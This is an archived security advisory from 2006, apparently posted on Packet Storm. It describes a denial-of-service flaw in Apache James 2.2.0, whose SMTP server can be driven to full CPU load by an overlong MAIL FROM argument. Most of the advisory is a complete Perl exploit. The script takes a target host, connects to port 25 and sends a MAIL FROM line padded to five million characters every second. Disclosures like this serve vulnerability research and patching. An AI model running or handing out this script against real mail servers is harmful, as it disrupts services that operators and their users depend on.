exploit the possibilities

JAMES2.2.0.txt

JAMES2.2.0.txt
Posted May 29, 2006
Authored by Ahmad Muammar W.K | Site y3dips.echo.or.id

It is possible to DOS Java Apache Mail Enterprise Server (a.k.a. Apache James) by sending it a long SMTP argument. POC included.

tags | exploit, java
MD5 | 3b16937b13c91271931fbb4c674cd88c

JAMES2.2.0.txt

Change Mirror Download
---------------------------------------------------------------------------
[ECHO_ADV_31$2006] JAMES 2.2.0 <-- Denial Of Service
---------------------------------------------------------------------------

Author : y3dips a.k.a Ahmad Muammar W.K
Date : April, 27th 2006
Location : Indonesia, Jakarta
Web : http://advisories.echo.or.id/adv/adv31-y3dips-2006.txt

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Application : Java Apache Mail Enterprise Server (a.k.a. Apache James)
version : 2.2.0
URL : http://jakarta.apache.org/avalon/phoenix
Description :

The Java Apache Mail Enterprise Server (a.k.a. Apache James) is
a 100% pure Java SMTP and POP3 Mail server and NNTP News server.
James also designed to be a complete and portable enterprise mail
engine solution based on currently available open protocols.

James is based upon the Apache Avalon application framework.
(For more information about Avalon, please go to http://avalon.apache.org/)

James requires Java 2 (either JRE 1.3 or 1.4 as of 2.0a3).

----------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

James SMTP servers are allowing attacker to supply a long variable at
SMTP argument (such as MAIL) to the SMTP server, because of this
vulnerability the Processor at server machine will have a workload till 100%


Exploit Code:
~~~~~~~~~~~~~

-------------------------- james.pl-----------------------------------------

#!/usr/bin/perl -w

use IO::Socket;

print "* DOS buat JAMES ver.2.2.0 by y3dips *\n";

if(@ARGV == 1)

{

my $host = $ARGV[0];
my $i = 1;

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>"25", Reuse=>1)
or die " Cannot Connect to Server !";

while ( $i++ ) {
print $socket "MAIL FROM:" . "fvclz" x 1000000 . "\r\n" and
print " -- sucking CPU resources at $host .....\n";
sleep(1);
}
close $socket;

}
else
{ print " Usage: $0 [target] \r\n\n"; }

---------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ the_day, moby, comex, z3robyte, K-158, c-a-s-e, S`to, lirva32, anonymous
~ newbie_hacker@yahoogroups.com
~ #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~~~~

Ahmad Muammar W.K || echo|staff || y3dips[at]echo[dot]or[dot]id
Homepage: http://y3dips.echo.or.id/
Blogs : http://y3d1ps.blogspot.com/

-------------------------------- [ EOF ] ----------------------------------
Login or Register to add favorites

File Archive:

July 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    15 Files
  • 2
    Jul 2nd
    19 Files
  • 3
    Jul 3rd
    12 Files
  • 4
    Jul 4th
    1 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    25 Files
  • 7
    Jul 7th
    35 Files
  • 8
    Jul 8th
    4 Files
  • 9
    Jul 9th
    9 Files
  • 10
    Jul 10th
    7 Files
  • 11
    Jul 11th
    4 Files
  • 12
    Jul 12th
    4 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close